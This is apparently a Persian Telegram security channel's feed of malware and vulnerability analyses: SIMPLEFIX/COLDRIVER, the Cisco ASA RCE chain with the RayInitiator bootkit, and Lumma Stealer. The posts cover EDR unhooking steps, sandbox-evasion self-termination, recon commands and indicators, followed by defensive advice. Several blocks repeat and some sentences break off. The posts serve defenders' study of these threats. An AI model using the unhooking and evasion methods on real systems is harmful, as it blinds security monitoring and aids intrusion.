در ورود مجدد کاربر، اسکریپت Stager اولیه اجرا میشود. این اسکریپت بهصورت Fileless ، اسکریپت AES-encrypted را از رجیستری خوانده، آن را با استفاده از ترکیب کلید Hardcoded و پارامتر خط فرمان، رمزگشایی و اجرا میکند. خروجی نهایی، بدافزار SIMPLEFIX است.
# الف. مکانیزمهای C2 و شناسایی (Discovery)
*۔ Beaconing (ارسال سیگنال): SIMPLEFIX هر ۳ دقیقه یک بار اقدام به برقراری ارتباط با C2 (
southprovesolutions[.]com) میکند.*۔ User-Agent داینامیک: SIMPLEFIX یک User-Agent منحصر به فرد با ترکیب نام کامپیوتر، نام کاربری و UUID ماشین تولید میکند که در تمام درخواستهای C2 گنجانده میشود. این تکنیک به مهاجم کمک میکند تا قربانیان را در سمت سرور به دقت شناسایی کند (T1033).
Please open Telegram to view this post
VIEW IN TELEGRAM
Mr. SAM
* قابلیتهای فرماندهی: این Backdoor از دستورات متعددی پشتیبانی میکند که مهمترین آنها عبارتند از:
* فرمان ۱: دانلود و اجرای فایلهای باینری جدید.
* فرمان ۲: اجرای مجموعهای از دستورات شناسایی (Reconnaissance) از جمله
* فرمان ۳ (Exfiltration): اجرای یک اسکریپت PowerShell تخصصی که فایلهای با پسوندهای مهم (مانند
این عملیات به دلیل همپوشانی فنی بالا (مانند استفاده از تکنیک رمزگشایی کلید نصف شده و الگوی مشابه جمعآوری اطلاعات) و همخوانی با پروفایل قربانیان (جامعه مدنی و مخالفان)، با اطمینان متوسط به گروه APT مرتبط با روسیه، COLDRIVER ، منتسب شده است.
۵. راه مقابله جامع و پیشرفته
این حمله، اهمیت اصول دفاعی پایه و در عین حال پیادهسازی مکانیزمهای دفاعی پیشرفته را برجسته میسازد.
1. محدودیت اجرای کد (Application Control):
* استفاده از ابزارهایی مانند Windows AppLocker یا Windows Defender Application Control (WDAC) برای مسدودسازی اجرای فایلهای DLL در مسیرهای غیر استاندارد و اسکریپتهای PowerShell غیرمجاز.
* اعمال محدودیت بر روی ابزارهای Native سیستمعامل مانند
2. امنیت End-Point و Log Analysis:
* فعالسازی مانیتورینگ دقیق رجیستری برای شناسایی تغییرات در کلیدهای Persistence حیاتی (مانند
* مانیتورینگ ترافیک خروجی برای شناسایی الگوهای Traffic Signaling (بررسی درخواستهای HTTP با User-Agent های غیرطبیعی) و مسدودسازی دسترسی به دامنههای C2 در فایروال.
3. آموزش و سیاستهای امنیتی:
* آموزش مستمر کاربران در مورد حملات Clipboard Hijacking و ClickFix و تأکید بر عدم اجرای دستورات نامعتبر در دیالوگ باکس Run.
* پیادهسازی اصل (Least Privilege) برای محدود کردن دامنه خسارت در صورت اجرای موفقیتآمیز بدافزار.
@NullError_ir
* فرمان ۱: دانلود و اجرای فایلهای باینری جدید.
* فرمان ۲: اجرای مجموعهای از دستورات شناسایی (Reconnaissance) از جمله
whoami /all ، ipconfig /all ، systeminfo و netstat -ano.* فرمان ۳ (Exfiltration): اجرای یک اسکریپت PowerShell تخصصی که فایلهای با پسوندهای مهم (مانند
.pdf, .doc, .xls, .zip) را در دایرکتوریهای حساس کاربر (شامل Documents, Downloads, Desktop و OneDrive) جستجو کرده و اطلاعات آنها را به C2 ارسال میکند. این بخش نشاندهنده تمرکز بر Strategic Intelligence Collection و شباهت رفتاری با بدافزار LOSTKEYS همین گروه است.این عملیات به دلیل همپوشانی فنی بالا (مانند استفاده از تکنیک رمزگشایی کلید نصف شده و الگوی مشابه جمعآوری اطلاعات) و همخوانی با پروفایل قربانیان (جامعه مدنی و مخالفان)، با اطمینان متوسط به گروه APT مرتبط با روسیه، COLDRIVER ، منتسب شده است.
۵. راه مقابله جامع و پیشرفته
این حمله، اهمیت اصول دفاعی پایه و در عین حال پیادهسازی مکانیزمهای دفاعی پیشرفته را برجسته میسازد.
1. محدودیت اجرای کد (Application Control):
* استفاده از ابزارهایی مانند Windows AppLocker یا Windows Defender Application Control (WDAC) برای مسدودسازی اجرای فایلهای DLL در مسیرهای غیر استاندارد و اسکریپتهای PowerShell غیرمجاز.
* اعمال محدودیت بر روی ابزارهای Native سیستمعامل مانند
rundll32.exe برای اجرای فایلهای غیرقابل اعتماد (Defense Evasion - T1218.011).2. امنیت End-Point و Log Analysis:
* فعالسازی مانیتورینگ دقیق رجیستری برای شناسایی تغییرات در کلیدهای Persistence حیاتی (مانند
UserInitMprLogonScript) و کلیدهای مورد استفاده برای ذخیرهسازی Payload (مانند CLSIDهای غیرمعمول در HKCU\SOFTWARE).* مانیتورینگ ترافیک خروجی برای شناسایی الگوهای Traffic Signaling (بررسی درخواستهای HTTP با User-Agent های غیرطبیعی) و مسدودسازی دسترسی به دامنههای C2 در فایروال.
3. آموزش و سیاستهای امنیتی:
* آموزش مستمر کاربران در مورد حملات Clipboard Hijacking و ClickFix و تأکید بر عدم اجرای دستورات نامعتبر در دیالوگ باکس Run.
* پیادهسازی اصل (Least Privilege) برای محدود کردن دامنه خسارت در صورت اجرای موفقیتآمیز بدافزار.
@NullError_ir
🔥 از Zero-Day RCE سیسکو (CVE-2025-20333)
تا بوتکیت RayInitiator در GRUB 💀
تحلیل آسیبپذیری و بهرهبرداری در Cisco
سیر تحولی یک رویداد امنیتی حیاتی در پلتفرمهای Cisco Secure Firewall ASA و FTD و یک عملیات سایبری بسیار پیشرفته و Zero-Day در سطح APT است که مستلزم اقدامات دفاعی فوری میباشد.
خلاصه و ترکیب آسیبپذیریها (CVE Correlation)
آسیبپذیری اصلی، نقص بحرانی Remote Code Execution (RCE) در مؤلفه VPN Web Server است که هنگام فعال بودن سرویسهای AnyConnect SSL VPN یا Webvpn قابل بهرهبرداری است.
CVE-2025-20333 => ۹.۹ (Critical) => هسته RCE => Buffer Overflow (CWE-120)
آسیبپذیری اصلی RCE: امکان اجرای کد دلخواه با دسترسی Root. بهرهبرداری فعال توسط APT**ها. رسماً نیاز به **Credentials VPN دارد.
CVE-2025-20362 => ۶.۵ (Medium) => پیشنیاز (Pre-Auth) => Unauthorized Access
نقص دور زدن احراز هویت: مهاجم را قادر میسازد تا بدون Credential به Endpointهای محدود VPN دست یابد. پتانسیل بالای اتصال به CVE-2025-20333 در یک Attack Chain.
CVE-2025-20363 => ۹.۰ (Critical) => گزارش اولیه => Input Validation Flaw (CWE-122)
گزارش اولیه و ناهمگون: مربوط به Input Validation. احتمالاً یک نقص کلی مرتبط یا گزارش اولیه است که توسط CVE-2025-20333 با دقت بیشتری (Buffer Overflow) توصیف شد.
نکته فنی: هرچند CVE-2025-20333 رسماً نیاز به احراز هویت دارد، اما وجود CVE-2025-20362 یک تهدید جدی برای ایجاد زنجیره حمله (Attack Chain) فراهم میکند که میتواند نیاز به Credential معتبر را حذف کرده و RCE را به یک عملیات Pre-Authentication RCE تبدیل کند.
تحلیل APT و بدافزارهای استقراری
این کمپین توسط یک عامل تهدید دولتی (State-Sponsored Threat Actor) با هدف جاسوسی سایبری انجام شده و از یک ابزار جنگی دو مرحلهای بسیار پیشرفته استفاده میکند:
۱۔ RayInitiator (بوتکیت: Persistence در سطح GRUB)
این بدافزار، یک Multi-Stage Bootkit است که مستقیماً برای ایجاد پایداری (Persistence) عمیق و مقاوم طراحی شده است.
* مکانیسم: RayInitiator خود را در Grand Unified Bootloader (GRUB) دستگاه Flash میکند.
* مزیت APT: این مکانیسم به بدافزار اجازه میدهد تا از ریبوتهای سیستمی و حتی بروزرسانیهای معمول Firmware جان سالم به در ببرد و یک Foot-hold دائمی و بسیار دشوار برای حذف ایجاد کند.
* هدف: بهطور خاص مدلهای قدیمیتر Cisco ASA 5500-X Series را هدف قرار میدهد که فاقد فناوری Secure Boot هستند.
۲۔ LINE VIPER (Payload Memory-Resident: ضد بدافزارکاوی)
این بدافزار، یک Shellcode Loader است که مستقیماً در حافظه (Memory-Resident) اجرا میشود و بخش اصلی کنترل مهاجم را فراهم میکند:
* اجرای فرمان: امکان اجرای دستورات با بالاترین سطح دسترسی (Privilege Level 15).
۔ Data Exfiltration تخصصی: قابلیت انجام Packet Capture مخفیانه از پروتکلهای احراز هویت حیاتی شبکه شامل RADIUS، LDAP و TACACS برای سرقت Credentials (اعتبارنامهها).
۔ Evasion و Anti-Forensics: یکی از پیشرفتهترین تاکتیکهای آن، قابلیت ریبوت فوری دستگاه در صورت تلاش مدیران برای گرفتن Core Dump یا اجرای دستورات خاص تحلیلی است. این اقدام، تلاشهای تحلیلگران برای بدافزارکاوی (Malware Analysis) را مختل میکند.
۔ C2 پیچیده: استفاده از کانالهای رمزگذاریشده HTTPS WebVPN و همچنین یک کانال ثانویه C2 با استفاده از ICMP Tunneling درون یک جلسه VPN، که شناسایی ارتباطات فرمان و کنترل را بسیار سخت میکند.
نتیجهگیری و راهکارهای مقابله پیشرفته
با توجه به ماهیت APT و سطح نفوذ (Root Shell و Bootkit)، تنها راه مقابله، مدیریت سریع Incident و اعمال تغییرات ساختاری است.
الف) راهکار حاد و فوری (Emergency Response)
۱۔ Patching اضطراری (Urgent Patching): هیچ Workaround مؤثری وجود ندارد. سازمانها باید فوراً تمامی دستگاههای ASA/FTD را با استفاده از Cisco Software Checker به آخرین نسخههای اصلاحشده ارتقاء دهند.
۲۔ Audit پیکربندی VPN: با استفاده از دستور
show running-config ، فعال بودن سرویسهای Webvpn یا AnyConnect SSL VPN را بررسی و در صورت عدم امکان Patching فوری، آنها را موقتاً غیرفعال کنید (با علم به تأثیر آن بر Business Continuity).۳. شکار تهدید (Threat Hunting):
* در اسرع وقت قوانین YARA مرتبط با RayInitiator و LINE VIPER را در سیستمهای تشخیص تهدید (Threat Detection Systems) خود پیادهسازی کنید.
* مراقب شاخص آلودگی (IOC) کلیدی باشید: هرگونه ریبوت غیرمنتظره دستگاه ASA پس از تلاش برای گرفتن Core Dump، باید بهعنوان یک هشدار قطعی آلودگی به LINE VIPER تلقی شود.
Please open Telegram to view this post
VIEW IN TELEGRAM
Mr. SAM
ب) راهکار دفاعی بلندمدت (Strategic Defense)
۱. جایگزینی EOL: مدلهای قدیمی Cisco ASA 5500-X را که فاقد Secure Boot هستند و هدف اصلی RayInitiator میباشند، فوراً از چرخه عملیاتی خارج و با نسل جدید فایروالها (NGFW) جایگزین کنید.
۲. تقویت احراز هویت: برای تمامی دسترسیهای VPN و مدیریتی، اجرای اجباری Multi-Factor Authentication (MFA) برای خنثیسازی حملات Credential Harvesting.
۳. تقسیمبندی (Segmentation): فایروالهای Perimeter را از شبکههای داخلی و حساس (مانند DMZ و دیتاسنتر) بهصورت منطقی جدا کنید تا در صورت Compromise، Pivot مهاجم محدود شود.
@NullError_ir
۱. جایگزینی EOL: مدلهای قدیمی Cisco ASA 5500-X را که فاقد Secure Boot هستند و هدف اصلی RayInitiator میباشند، فوراً از چرخه عملیاتی خارج و با نسل جدید فایروالها (NGFW) جایگزین کنید.
۲. تقویت احراز هویت: برای تمامی دسترسیهای VPN و مدیریتی، اجرای اجباری Multi-Factor Authentication (MFA) برای خنثیسازی حملات Credential Harvesting.
۳. تقسیمبندی (Segmentation): فایروالهای Perimeter را از شبکههای داخلی و حساس (مانند DMZ و دیتاسنتر) بهصورت منطقی جدا کنید تا در صورت Compromise، Pivot مهاجم محدود شود.
@NullError_ir
بدافزار Lumma Stealer که توسط مجرمان سایبری در بخشهای مختلف (از جمله مخابرات، بهداشت، بانکداری و بازاریابی) مورد استفاده قرار میگرفت، با واریانتهای جدید ظاهر و نشاندهنده یک تهدید سایبری جاری و تکامل یافتهتر است.
* ساختار و زنجیره آلودگی
تحلیل نمونهای از این بدافزار با هش
87118baadfa7075d7b9d2aff75d8e730 نشان میدهد که Lumma Stealer از ابزارهای قانونی برای پنهانکاری استفاده میکند، تاکتیکی که اغلب توسط APTها برای دور زدن راهکارهای امنیتی سنتی به کار میرود.1. بسته نصبکننده: نمونه تحلیلشده یک فایل NSIS (Nullsoft Scriptable Install System) است. مهاجمان با سوءاستفاده از این ابزارهای قانونی و پرکاربرد، نرخ تشخیص اولیه را پایین نگه میدارند.
2. استخراج اجزا: پس از استخراج (توسط ابزاری مانند 7z)، دو جزء کلیدی ظاهر میشوند:
الف " [NSIS].nsi: یک اسکریپت NSIS Obfuscated که زنجیره آلودگی را با فراخوانی Parish.m4a آغاز میکند.
ب : Parish.m4a: یک (Batch File) مبهمسازی شده که مسئول اجرای مرحله بعد است. سایر فایلهای با پسوند *.m4a حاوی Blobs دادههای رمزنگاری شده برای Payload اصلی هستند.
3. سوءاستفاده از AutoIt: اسکریپت دستهای، فایل اجرایی قانونی autoit3.exe را به همراه یک فایل اسکریپت مخرب با پسوند .a3x اجرا میکند. AutoIt یک زبان اسکریپتنویسی قانونی برای اتوماسیون وظایف در ویندوز است، اما در اینجا برای مقاصد غیرقانونی مورد سوءاستفاده قرار میگیرد.
4. کد مبهمسازی شده AutoIt: اسکریپت A3X با استفاده از تکنیکهایی مانند حلقه while و ساختار switch-case مبهمسازی شده تا تحلیل استاتیک آن دشوار باشد. پس از ابهامزدایی، اسکریپت نهایی حاوی منطق اصلی بدافزار از جمله تکنیکهای پایداری و فرار است.
* مکانیزم های فرار پیشرفته
بدافزار Lumma Stealer از چندین تکنیک پیشرفته و سطح بالا برای جلوگیری از تحلیل در محیطهای Sandbox و ابزارهای امنیتی استفاده میکند:
۱. بررسی محیط اجرا
بدافزار پیش از اجرای کامل Payload، محیط را برای تشخیص Sandbox یا ماشینهای مجازی اسکن میکند. این کار با بررسی موارد زیر صورت میگیرد:
* نام کامپیوتر (COMPUTERNAME)
* نام کاربری (USERNAME)
* وجود پردازشهای ابزار مجازیسازی: جستجوی پردازشهایی مانند vmtoolsd.exe (VMware), VboxTray.exe (VirtualBox) و SandboxieRpcSs.exe (Sandboxie).
* وجود پردازشهای آنتیویروس: جستجوی پردازشهایی مانند avastui.exe.
۲. تکنیک (Anti-debugging)
این بدافزار از اختلاف در مدیریت زمان و سرعت اجرا بین سیستمهای واقعی و محیطهای تحلیلی سوءاستفاده میکند. این تاکتیک با اندازهگیری زمان صرفشده برای اجرای یک قطعه کد یا توقفهای مصنوعی، میتواند حضور یک دیباگر را تشخیص دهد.
۳. بررسی (Anti-analysis)
این نمونه تلاش میکند تا با پینگ کردن یک دامنهی ساختگی/غیرواقعی (Fabricated Domain) ، محیط را بررسی کند. اگر دامنه در دسترس باشد، ممکن است نشاندهنده یک محیط کنترلشده (مانند Sandbox) باشد که ترافیک شبکه را شبیهسازی میکند. در این صورت، پردازش AutoIt خودکشی (self-terminates) میکند.
۴. انجام (DLL Unhooking)
این یک تکنیک پیشرفته دفاعی است که اغلب در بدافزارهای APT level دیده میشود.
* نرمافزارهای امنیتی (مانند EDRها) برای نظارت و مسدود کردن فراخوانیهای حیاتی API ویندوز (مثل
NtCreateProcess در ntdll.dll)، شروع توابع را Hook میکنند (یعنی بایتهای اولیه تابع را تغییر میدهند تا اجرا به کد امنیتی هدایت شود).*۔ Lumma Stealer با بازیابی بایتهای اصلی و Unhook شده تابع در حافظه، کنترل امنیتی را باطل میکند و اجازه میدهد فراخوانیهای مخرب API بدون نظارت اجرا شوند.
۵. مکانیزم پایداری
بدافزار برای حفظ دسترسی در سیستم آلوده، از روش ایجاد یک میانبر اینترنتی (.url) در پوشه Startup ویندوز استفاده میکند. این میانبر پس از راهاندازی سیستم، یک JScript را اجرا میکند که با استفاده از
Wnoscript.Shell ، Payload نهایی AutoIt را مجدداً اجرا میکند.مرحله (Next-Stage Payload)
بدافزار Lumma Stealer از تکنیکهای رمزگشایی و فشردهسازی در حافظه برای پنهان کردن Payload نهایی استفاده میکند:
* رمزگشایی در حافظه: بدافزار با استفاده از یک تابع خودتعریف، دادههای رمزنگاری شده را رمزگشایی میکند.
* فشردهسازی برای پنهانکاری بیشتر و کاهش حجم، بدافزار از API ویندوز
RtlDecompressFragmentWindows استفاده کرده و دادهها را با فرمت LZ Compression (پارامتر 0x2) از حالت فشرده خارج میکند.Please open Telegram to view this post
VIEW IN TELEGRAM
Mr. SAM
و Payload نهایی PE: نتیجه این عملیات، یک فایل (PE) است که به صورت (مقیم در حافظه) Memory resident باقی میماند. به دلیل غیرفعال بودن سرور C2 در زمان تحلیل، امکان بررسی بیشتر این Payload وجود نداشته است.
رویکرد تشخیص مبتنی بر یادگیری ماشین
۱. معماری مدل
* ورودیها: Sandbox نمونههای مشکوک را در یک محیط ویندوز ایزولهشده اجرا کرده و رفتارهای زمان اجرا را ثبت میکند، از جمله:
* ۔(Process Trees): با جزئیاتی مانند فراخوانیهای API و تعاملات DLL.
* تغییرات رجیستری
* عملیات فایل
* فعالیت شبکه
* مدل (Tree Transformer Architecture): این مدل از یک معماری Transformer (مشابه آنچه در مدلهای زبان بزرگ استفاده میشود) برای درک الگوهای پیچیده در درختهای پردازشی استفاده میکند. این مدل از Tree Positional Embeddings برای کدگذاری موقعیت هر گره در درخت استفاده میکند.
* تلفیق ویژگیها: بردارهای ویژگیهای رفتاری زمان اجرا (مانند تغییرات رجیستری و شبکه) با Embeddings در Processing tree ترکیب میشوند تا طبقهبندی نهایی بدافزار انجام شود.
۲. مزیت رویکرد Transformer
استفاده از معماری Transformer در این زمینه این امکان را به مدل میدهد تا الگوهای رفتاری تعمیمیافته (Generalized Behavioral Patterns) را تشخیص دهد. این امر به طور مؤثری از Overfitting به دادههای آموزشی جلوگیری کرده و به طور قابل توجهی قابلیت تشخیص تهدیدات دیدهنشده (Previously Unseen Threats) و واریانتهای جدید و Novel بدافزارهایی مانند Lumma Stealer را افزایش میدهد.
۳. نتیجه تشخیص
مدل ML-Powered Sandbox نمونه مورد تحلیل Lumma Stealer را با موفقیت پرچمگذاری کرد. کد تشخیص Gen.Detect.By.NSCloudSandbox.tr نشاندهنده شناسایی موفقیتآمیز توسط موتور Cloud Sandbox است.
@NullError_ir
رویکرد تشخیص مبتنی بر یادگیری ماشین
۱. معماری مدل
* ورودیها: Sandbox نمونههای مشکوک را در یک محیط ویندوز ایزولهشده اجرا کرده و رفتارهای زمان اجرا را ثبت میکند، از جمله:
* ۔(Process Trees): با جزئیاتی مانند فراخوانیهای API و تعاملات DLL.
* تغییرات رجیستری
* عملیات فایل
* فعالیت شبکه
* مدل (Tree Transformer Architecture): این مدل از یک معماری Transformer (مشابه آنچه در مدلهای زبان بزرگ استفاده میشود) برای درک الگوهای پیچیده در درختهای پردازشی استفاده میکند. این مدل از Tree Positional Embeddings برای کدگذاری موقعیت هر گره در درخت استفاده میکند.
* تلفیق ویژگیها: بردارهای ویژگیهای رفتاری زمان اجرا (مانند تغییرات رجیستری و شبکه) با Embeddings در Processing tree ترکیب میشوند تا طبقهبندی نهایی بدافزار انجام شود.
۲. مزیت رویکرد Transformer
استفاده از معماری Transformer در این زمینه این امکان را به مدل میدهد تا الگوهای رفتاری تعمیمیافته (Generalized Behavioral Patterns) را تشخیص دهد. این امر به طور مؤثری از Overfitting به دادههای آموزشی جلوگیری کرده و به طور قابل توجهی قابلیت تشخیص تهدیدات دیدهنشده (Previously Unseen Threats) و واریانتهای جدید و Novel بدافزارهایی مانند Lumma Stealer را افزایش میدهد.
۳. نتیجه تشخیص
مدل ML-Powered Sandbox نمونه مورد تحلیل Lumma Stealer را با موفقیت پرچمگذاری کرد. کد تشخیص Gen.Detect.By.NSCloudSandbox.tr نشاندهنده شناسایی موفقیتآمیز توسط موتور Cloud Sandbox است.
@NullError_ir
Mr. SAM
و Payload نهایی PE: نتیجه این عملیات، یک فایل (PE) است که به صورت (مقیم در حافظه) Memory resident باقی میماند. به دلیل غیرفعال بودن سرور C2 در زمان تحلیل، امکان بررسی بیشتر این Payload وجود نداشته است. رویکرد تشخیص مبتنی بر یادگیری ماشین ۱. معماری مدل…
در یک محیط آزمایشگاهی، درک اینکه بدافزاری مانند Lumma Stealer چگونه لایههای دفاعی را باطل میکند، مستلزم شناخت عمیق از معماری سیستمعامل ویندوز و نحوه کارکرد راهکارهای امنیتی نظیر EDR (Endpoint Detection and Response) است.
۱. مکانیزم Hooking توسط راهکارهای امنیتی
راهکارهای امنیتی مدرن (مانند آنتیویروسها و EDRها) برای نظارت بر فعالیتهای حیاتی یک فرآیند ویندوز، از مکانیزم API Hooking استفاده میکنند.
1۔ DLLهای هدف: عموماً توابع حیاتی ویندوز که در DLLهای سطح پایین مانند ntdll.dll (شامل توابع Native API مانند
NtCreateProcess , NtWriteFile , NtAllocateVirtualMemory ) و kernel32.dll قرار دارند، هدف این تکنیک هستند.2۔ فرآیند (Inline Hooking)
* هنگامی که یک فرآیند (مثلاً فرآیند Lumma Stealer) شروع به کار میکند، EDR به فضای آدرس آن فرآیند تزریق میشود.
* ۔EDR بایتهای اولیه (Preamble) تابع هدف در حافظه (مثلاً تابع
NtCreateProcess در ntdll.dll) را بازنویسی میکند.* این بایتهای بازنویسی شده معمولاً شامل دستورات JMP یا CALL هستند که اجرای طبیعی تابع را به یک قطعه کد رهگیری در داخل کتابخانه EDR هدایت میکنند.
* نتیجه: پیش از اینکه فراخوانی سیستم (Syscall) واقعی به کرنل برسد، EDR فرصت دارد که آرگومانها را بررسی کرده و در صورت مخرب بودن، آن را مسدود کند.
۲. مکانیزم Unhooking توسط بدافزار (Lumma Stealer)
بدافزار Lumma Stealer و سایر بدافزارهای APT برای فرار از این نظارت، این فرآیند را معکوس میکنند:
1. هدف: بازگرداندن حافظه تابع Hook شده به حالت اصلی و تمیز آن.
2. منبع داده اصلی: بدافزار برای به دست آوردن کدهای اصلی و Unhook شده، از تکنیکهای زیر استفاده میکند:
* بارگیری مجدد DLL : بدافزار میتواند نسخه تمیز DLL هدف (مثلاً
ntdll.dll) را مجدداً بارگیری کند، اما نه در فضایی که توسط ویندوز استفاده میشود (معمولاً با استفاده از LoadLibraryEx با پرچمهای خاص). سپس بایتهای اولیه تابع هدف را از این نسخه جدید خوانده و کپی میکند.* خواندن از دیسک: بدافزار میتواند به طور مستقیم فایل DLL اصلی (مثلاً
C:\Windows\System32\ntdll.dll ) را از دیسک بخواند و Preamble اصلی تابع را استخراج کند. این روش رایجتر و قابل اعتمادتر است، چرا که نسخه روی دیسک (معمولاً) دستکاری نشده است.3. بازنویسی حافظه (Memory Overwrite):
* بدافزار تابع
VirtualProtect را فراخوانی میکند تا دسترسی به حافظه آن بخش از ntdll.dll را از READ/EXECUTE به READ/WRITE/EXECUTE تغییر دهد.* بایتهای اصلی استخراجشده (Preamble تمیز) را روی حافظه تابع Hook شده کپی میکند.
* دسترسی حافظه را دوباره به حالت اولیه READ/EXECUTE برمیگرداند.
نتیجه Unhooking: از این لحظه به بعد، هر فراخوانی سیستم از داخل فرآیند بدافزار به آن تابع (مثلاً
NtCreateProcess) مستقیماً به هسته سیستم عامل هدایت میشود و راهکار امنیتی (EDR) در عمل کور میشود و نمیتواند آن فعالیت را نظارت یا مسدود کند.پیادهسازی و تحلیل در محیط آزمایشگاهی
ابزارهای مورد نیاز:
*۔ Debugger/Disassembler: IDA Pro / Ghidra / x64dbg
* زبان برنامهنویسی: Python (برای اسکریپتنویسی) و ++C یا Assembly (برای ساخت PoC)
* سیستمعامل: ویندوز ۱۰/۱۱ (در محیط VM)
مراحل شبیهسازی دفاعی (Defense PoC):
برای درک عمیقتر، میتوانیم یک PoC (Proof of Concept) با Python و کتابخانه ctypes برای تزریق کد یا یک DLL ساده با ++C/C برای Hooking بسازیم.
1۔ Hooking اولیه: تابعی را در
ntdll.dll (مانند NtResumeThread) انتخاب کرده و یک JMP به تابع رهگیری خودتان تزریق کنید.2۔ تحلیل Unhooking (Reverse Engineering):
* بدافزار Lumma Stealer را در x64dbg اجرا کنید.
*۔ Breakpoint را روی توابع کلیدی ویندوز تنظیم کنید:
*۔ LoadLibraryExW: برای رصد تلاش جهت بارگیری مجدد
ntdll.dll.*۔ CreateFileW / ReadFile: برای رصد تلاش برای خواندن
ntdll.dll از دیسک.*۔ VirtualProtect: این مهمترین Breakpoint است. هر فراخوانی به
VirtualProtect که دسترسی حافظه DLLهای سیستمی را به WRITE تغییر دهد، نشاندهنده یک Unhooking قریبالوقوع است.با دنبال کردن اجرای کد پس از
VirtualProtect ، میتوانید دقیقاً متوجه شوید که بدافزار چگونه بایتهای اصلی را محاسبه یا بازیابی کرده و آنها را بر روی حافظه Hook شده مینویسد.@NullError_ir
Please open Telegram to view this post
VIEW IN TELEGRAM
Mr. SAM
مکانیزم پیشرفته ضدتحلیل
خودکشی پردازشی یا Self-Termination یکی از تاکتیکهای کلیدی در بدافزارهای مدرن مانند Lumma Stealer است. این تکنیک یک اقدام دفاعی نهایی است که بدافزار برای جلوگیری از تحلیل خود در محیطهای کنترلشده، مانند Sandboxها و ماشینهای مجازی (VMs) به کار میگیرد.
بر خلاف پایان دادن عادی به یک فرآیند (ExitProcess) ، خودکشی پردازشی در بدافزارها با یک مکانیزم تصمیمگیری پیشرفته گره خورده است که بر مبنای یافتههای (Anti-Analysis) عمل میکند.
۱. معماری تصمیمگیری (Decision Architecture)
خودکشی پردازشی هرگز به صورت تصادفی رخ نمیدهد، بلکه نتیجه شکست بدافزار در عبور از تستهای محیطی است. این فرآیند از الگوریتمهای شرطی تو در تو (Nested Conditional Logic) استفاده میکند:
بررسی فرآیندها/فایلهای VM (مانند
vmtoolsd.exe , VBoxGuestAdditions.sys) بررسی نامهای سیستمی (مانند
COMPUTERNAME یا USERNAME پیشفرض Sandboxها) بررسی زمانبندی و وقفه (Timing and Delay) اجرای سریع و نرم دستورات
بررسی (Debugger Presence) عدم یافتن پرچم BeingDebugged
تست ارتباط شبکه (Fabricated Domain Ping) عدم پاسخگویی به دامنهی ساختگی
۲. مکانیزمهای فنی خودکشی (Technical Self-Termination Methods)
پس از اینکه بدافزار از طریق تستهای بالا به قطعیت رسید که در حال تحلیل است، از یکی از روشهای زیر برای پایان دادن به فرآیند خود استفاده میکند:
الف) فراخوانی مستقیم API (Direct API Call)
سادهترین و رایجترین روش، فراخوانی توابع Native API برای خاتمه دادن به فرآیند جاری است:
۔* ExitProcess: این تابع سطح بالا در
kernel32.dll است و رایجترین روش خاتمه دادن به فرآیند است.۔* NtTerminateProcess: این تابع Native API در
ntdll.dll است و یک فراخوانی سطح پایینتر به هسته است. در بدافزارهای مدرن، اغلب از این تابع استفاده میشود تا احتمال Hooking توسط EDRها کمتر شود.NtTerminateProcess( (HANDLE)-1, 0 );
👆 -1 نشاندهنده فرآیند جاری است
ب) تولید استثنای کشنده (Generating Fatal Exception)
یک روش پیشرفتهتر و پنهانتر، مجبور کردن سیستمعامل به خاتمه دادن به فرآیند از طریق تولید یک خطای غیرقابل بازیابی (Fatal Exception) است. این کار میتواند تحلیلگر را گمراه کند:
* فراخوانی RaiseException با کد خطا: بدافزار میتواند عمداً یک استثناء با کدهای خطای خاص (مثلاً
STATUS_ILLEGAL_INSTRUCTION) ایجاد کند. اگر بدافزار در یک محیط Sandbox بدون مدیریت استثناء فعال باشد، سیستمعامل به سادگی فرآیند را خاتمه میدهد.* دستورات Assembly غیرقانونی (Illegal Instructions): اجرای مستقیم دستورات اسمبلی نامعتبر (مانند INT 3 برای دیباگرها یا دستوراتی که پردازنده فعلی پشتیبانی نمیکند) میتواند منجر به خطای سختافزاری و خاتمه فرآیند شود.
ج) Self-Overwrite و پاکسازی حافظه (Self-Overwrite and Memory Cleansing)
پیشرفتهترین بدافزارها قبل از خودکشی، بخشی از حافظه حیاتی خود را Overwrite کرده یا Unmap میکنند.
* هدف: جلوگیری از استخراج Payload نهایی یا کلیدهای رمزگشایی در لحظه مرگ فرآیند.
* روش: استفاده از توابعی مانند VirtualFree برای آزاد کردن نواحی تخصیص یافته حافظه (به خصوص نواحی حاوی Payload مرحله بعد) یا بازنویسی بخشهای کد با دادههای تصادفی/صفر (Zero-out) قبل از فراخوانی
ExitProcess .۳. خودکشی هوشمند (Smart Self-Termination) در بدافزارهای امروزی
در بدافزارهای APT، خودکشی پردازشی صرفاً یک پایان ساده نیست، بلکه بخشی از یک استراتژی دفاعی است:
1۔ Delay and Exit: بدافزار ممکن است تشخیص دهد که در حال تحلیل است، اما به جای خاتمه فوری، برای مدت کوتاهی به اجرای عملیاتهای بیضرر ادامه میدهد (مثلاً خوابیدن برای یک مدت طولانی با SleepEx یا حلقههای طولانی) و سپس به طور ناگهانی خاتمه مییابد. این کار باعث میشود ابزارهای تحلیل خودکار، قبل از رسیدن به نقطه خودکشی، به دلیل محدودیت زمان اجرا، تحلیل را متوقف کنند و گزارش دهند که بدافزار "فعالیتی نداشته است".
2۔ Clean Exit vs. Crash Exit: بدافزارهای پیچیده تمایل دارند از Clean Exit (خاتمه تمیز با API مانند
ExitProcess) استفاده کنند تا فرآیند به طور ناگهانی "Crash" نشود و گزارش خطا یا Dumps حافظه ایجاد نشود که بتواند توسط تحلیلگر بررسی شود.Please open Telegram to view this post
VIEW IN TELEGRAM
Mr. SAM
3۔ انتشار پرچم در رجیستری: بدافزار ممکن است قبل از خودکشی، یک پرچم در رجیستری یا فایلهای موقت ایجاد کند. اگر مهاجم فرآیند را به صورت دستی دوباره اجرا کند، بدافزار ابتدا این پرچم را چک کرده و اگر آن را بیابد (به این معنی که قبلاً در این محیط مرده است)، سریعتر خودکشی میکند تا وقت تحلیلگر گرفته نشود.
نکته فنی برای تحلیلگران: برای مقابله با این تکنیک، در محیط Sandbox، باید تکنیک Hardware Breakpoint را روی توابع
@NullError_ir
نکته فنی برای تحلیلگران: برای مقابله با این تکنیک، در محیط Sandbox، باید تکنیک Hardware Breakpoint را روی توابع
ExitProcess و NtTerminateProcess تنظیم کرده و بدافزار را قبل از اجرای این دستور متوقف کرد تا امکان استخراج آخرین وضعیت حافظه فراهم شود.@NullError_ir
Mr. SAM
دستورات Assembly غیرقانونی (Illegal Instructions)
Illegal Instruction.pdf
918.8 KB
Please open Telegram to view this post
VIEW IN TELEGRAM
